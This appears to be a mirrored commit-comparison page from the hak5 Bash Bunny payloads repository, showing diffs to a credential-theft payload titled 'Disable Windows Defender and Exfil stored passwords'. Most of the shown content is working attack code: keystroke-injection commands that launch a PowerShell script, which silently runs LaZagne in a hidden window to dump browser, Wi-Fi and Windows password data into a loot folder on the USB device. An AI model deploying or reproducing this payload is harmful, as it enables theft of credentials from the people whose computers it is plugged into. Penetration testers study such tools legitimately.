hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: hak5:b1cf7e8ef485e73ee0afe0a87bf90d579c14c8f5
Branches Tags
hak5:master
hak5:revert-583-master
hak5:cleanup
hak5:v1.2
hak5:v1.1
hak5:v1.0
...
compare: hak5:774cc77212d3b39f6af6fdfaf7359a376aa40cc3
Branches Tags
hak5:master
hak5:revert-583-master
hak5:cleanup
hak5:v1.2
hak5:v1.1
hak5:v1.0

2 Commits
b1cf7e8ef4 ... 774cc77212

Author SHA1 Message Date
Rafa Guillermo 774cc77212 fix shell.bat again 2024-09-30 13:15:25 +02:00
Rafa Guillermo 5da19abe97 updated payload to make drive label and switch generic 2024-09-30 13:14:28 +02:00
3 changed files with 11 additions and 11 deletions
Show Stats Expand all files Collapse all files

3
payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1
View File

@ -1,4 +1,5 @@
$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber') $drivelabel = 'BashBunny'
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
$filter = 'password_'+ $env:COMPUTERNAME $filter = 'password_'+ $env:COMPUTERNAME
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1) $filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt') Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')

16
payloads/library/credentials/NoDefenseAgainstLaZagne/payload.txt
View File

@ -2,16 +2,13 @@
# #
# Title: Disable Windows Defender and Exfil stored passwords # Title: Disable Windows Defender and Exfil stored passwords
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... # Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
# Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: # This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
# chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. # This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
# This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload
# springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
#
# Author: rafa-guillermo # Author: rafa-guillermo
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz # Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
# Version: 1.0 # Version: 1.2
# Category: Credentials # Category: Credentials
# Target: Windows 11 # Target: Windows
# Tested On: Windows 11 # Tested On: Windows 11
# Attackmodes: HID, STORAGE # Attackmodes: HID, STORAGE
@ -22,6 +19,7 @@ LOOTDIR=/root/udisk/loot/PasswordGrabber
LED SETUP LED SETUP
GET SWITCH_POSITION GET SWITCH_POSITION
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
DRIVE_LABEL=BashBunny
######## Make Loot Dir ######## ######## Make Loot Dir ########
# Setup named logs in loot directory # Setup named logs in loot directory
@ -53,9 +51,9 @@ sleep 1
# Run laZagne # Run laZagne
LED STAGE2 LED STAGE2
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='BashBunny'\" | Select-Object -ExpandProperty DriveLetter)" QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
QUACK ENTER QUACK ENTER
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\switch1\\payload.ps1\"" QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
QUACK ENTER QUACK ENTER
QUACK STRING \& \$scriptPath QUACK STRING \& \$scriptPath
QUACK ENTER QUACK ENTER

3
payloads/library/credentials/NoDefenseAgainstLaZagne/readme.md
View File

@ -16,7 +16,8 @@ Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads
## Configuration ## Configuration
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too. 1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling. 2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
3. Plug your BashBunny and Enjoy 3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
4. Plug your BashBunny and Enjoy
## Info ## Info